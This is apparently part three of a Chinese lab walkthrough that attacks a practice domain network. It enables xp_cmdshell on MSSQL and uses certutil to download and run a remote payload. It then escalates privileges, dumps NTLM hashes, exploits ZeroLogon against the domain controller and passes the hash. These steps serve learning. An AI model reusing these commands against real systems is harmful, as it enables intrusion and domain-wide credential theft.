域渗透之外网打点到三层内网(三)

简介: 域渗透之外网打点到三层内网

6.mssqlclient 登录Mssql服务器

使用mysql用户和密码进行登录。

00fcc2cf059776e9b4f7a37d72ee951c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

7.xp_cmshell进行getshell

help查看可以执行那些命令。

36fd5cf313c7d20b03a02b8846075c4e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

开启xp_cmdshell,然后进行信息收集。

f240a925e594ba2f2ff86cf0b40831d9_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


使用certutil远程下载之前的木马,然后进行上线


xp_cmdshell certutil -urlcache -split -f http://x.x.x.x/artifact.exe c:/windows/temp/artifact.exe

b3f78df958312e1aadbe846f4c8962d8_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


8.使用SweetPotato (ms16-075)提权

上线之后,进行简单的信息收集。

2028b8ddb5213bda0aec7580e3f7733b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后使用第三方插件,利用SweetPotato (ms16-075)提权对其进行提权。

e1116d9b3f5460621e6bfd32d0bdc3f5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功提权。

4fa255d0eed1145161163e95e204173d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

内网域渗透

1.内网域信息收集

使用net view查看域内主机。

339058cbc46cbb22d17afc1e71ccb7d4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


使用hashdump进行抓取一些用户的hash值。

0da34dab9be5471f68b664efafdc4c67_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

查看主机ip地址。

3f5b7fca87e76e777e423cb95bdfc25f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

查看域控的Ip地址,和域控的计算机名。

edb9f0ac72ec0f575067c80ee4a8d591_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

b67f06d95ffafaf3a2424c7e3a75be93_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.ZeroLogon CVE-2020-1472 获取域控权限

编译zerolgin的脚本成为exe,然后进行测试,发现主机存在该漏洞。

fc3bd8a90d188388f4b587aac5cdfb58_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

将它设置为空密码。31d6cfe0d16ae931b73c59d7e0c089c0

e87cf52fcbf4f8c96d3ff4f36b43ed1c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3.配置代理,登录域控

配置kali的代理地址,然后进行端口扫描,测试代理是否连接。

b8aabe5f90102c10d6036b0ca1847dd0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

获取域控的hash值。

b8ff98fece55e53f4e23b109b247e3a9_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b20eb34f01eaa5ac8b6f80986c765d6d:::
sec123.cnk\cnk:1108:aad3b435b51404eeaad3b435b51404ee:83717c6c405937406f8e0a02a7215b16:::
AD01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SERVER2012$:1109:aad3b435b51404eeaad3b435b51404ee:cc759f89477f1595c993831ce5944e95:::


然后进行登录域控。

8737f7d2a0e3a7849a1fdef80131d22d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

4.PTH上线CS

关闭防火墙,利用pth进行上线cs。

94319008ee0c15d51926cbf852bc6e67_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功执行命令。

0b346cf221c3b8983045912a55119094_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

生成tcp监听,然后jump到域控主机。

de93354343a5af11a302ad3326fc5aaf_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

5.恢复密码、原hash。

恢复密码。

23945abde2b45f0b4cd694f8010f0c1e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


使用 secretsdump.py获取其hash值。


python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCA

8b5af01c220181e8d78d47a0297a36a4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


使用以下命令恢复域控密码。成功恢复其密码。


proxychains4 python3 reinstall_original_pw.py ad01 10.10.10.139 fb61e3c372e666adccb7a820aa39772f

1eaaf9566b9b3b2b4d53c6f4905dedc9_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


靶机到这里就结束了。

aeac8435d5ef5bec5448af759e6da77a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

最后,成功拿下整个域控。

f8b07a7fc1526ae1b7e6afa41569c48a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

总结:

该项目从环境搭建,使用vps将web1主机映射到公网上。通过信息收集,搜索源码,然后分析源码,进行sql注入。编写sql注入脚本进行注入,通过分析登录端的源码编写加密脚本,在编写目录穿越脚本成功获取webshell。在内网渗透中,使用frp反向代理上线cs,使用xp_cmdshell进行getshell。在域渗透中使用CVE-2020-1472获取域控权限。这台靶机中没装杀软,但是从外网打点到内网渗透,再到域渗透中的知识面是非常广的。

相关文章
|
6月前
仅操作一台设备,如何实现本地访问另一个相同网段的私网?
仅操作一台设备,如何实现本地访问另一个相同网段的私网?
|
5月前
|
安全 网络协议 Linux
【内网安全】 隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线
【内网安全】 隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线
|
6月前
|
监控 网络协议 安全
【亮剑】当设备IP能ping通但无法上网时,可能是DNS解析、网关/路由设置、防火墙限制、网络配置错误或ISP问题
【4月更文挑战第30天】当设备IP能ping通但无法上网时,可能是DNS解析、网关/路由设置、防火墙限制、网络配置错误或ISP问题。解决步骤包括检查网络配置、DNS设置、网关路由、防火墙规则,以及联系ISP。预防措施包括定期备份配置、更新固件、监控网络性能和实施网络安全策略。通过排查和维护,可确保网络稳定和安全。
1096 1
|
存储 安全 网络协议
《内网安全攻防》内网信息收集
《内网安全攻防》内网信息收集
86 0
|
安全 Java 关系型数据库
域渗透之外网打点到三层内网(二)
域渗透之外网打点到三层内网
223 0
域渗透之外网打点到三层内网(二)
|
SQL 安全 网络安全
域渗透之外网打点到三层内网(一)
域渗透之外网打点到三层内网
177 0
域渗透之外网打点到三层内网(一)
|
缓存 安全 网络安全
详解通信数据转发程序:代理、网关、隧道
1.代理 代理服务器的基本行为就是接收客户端发送的请求后转发给其他服务器 持有资源实体的服务器被称为源服务器。从源服务器返回的响应经过代理服务器后再传给客户端 每次通过代理服务器转发请求或响应时,会追加写入Via首部信息🎶
210 2
详解通信数据转发程序:代理、网关、隧道
|
网络协议 网络架构
不同网段通信的过程
不同网段通信的过程
521 0
|
缓存 网络协议 网络架构
跨网段通信过程
原因:封装3层:源IP、目的IP不变,封装2层:源MAC封装接口F0/1的MAC地址(192.168.1.100),目的MAC封装目的IP的MAC地址(192.168.2100),路由器去ARP缓存表中找到对应的地址,成功重新封装ICMP包并存F0/1中转发出去。步骤九:路由器从F0/0重新封装并转发的ICMP回应包原因:路由器收到PC2发表的ICMP回应包,逐层解封装(解封装2层,目的MAC是路由器自己接口的MAC地址,连续解封装3层,目的IP不是路由器自己的IP,根据目的IP 192.168.1.1与路由器中的每一个路由条目进行与运算,找到匹配的路由条目,根据该匹配的路由表重新封装。封装I
跨网段通信过程